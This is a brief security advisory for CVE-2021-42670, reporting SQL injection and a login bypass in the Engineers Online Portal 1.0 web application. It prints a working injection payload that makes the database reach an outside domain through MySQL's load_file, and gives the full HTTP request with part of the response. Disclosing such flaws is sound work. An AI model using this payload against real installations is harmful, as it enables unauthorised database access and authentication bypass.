CVE-nu11-101321
CVE-2021-42670
Vendor
Description:
The id parameter from my_classmates.php on the Engineers Online Portal 1.0 app appears to be vulnerable to three types of SQL injection attacks, boolean-based blind, error-based, and UNION query. The payload '+(select load_file('\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also, user login is vulnerable to SQL-Injection bypass authentication on parameter "username".
MySQL Request:
GET /nia_munoz_monitoring_system/my_classmates.php?id=191'%2b(select%20load_file('%5c%5c%5c%5chh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net%5c%5cggc'))%2b' HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=5ndeh840im8k21e9mtnu57gp11
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0Response:
HTTP/1.1 200 OK
Date: Wed, 13 Oct 2021 07:15:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10632
<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
<meta name="description" content="Learning Management System">
<meta name="keywords" conte
...[SNIP]...Reproduce:
Proof:
NOTE:
- The PoC's will be encrypted, sorry about this dear friends!
- If someone wants to see this work, please write me!
- KR @nu11secur1ty
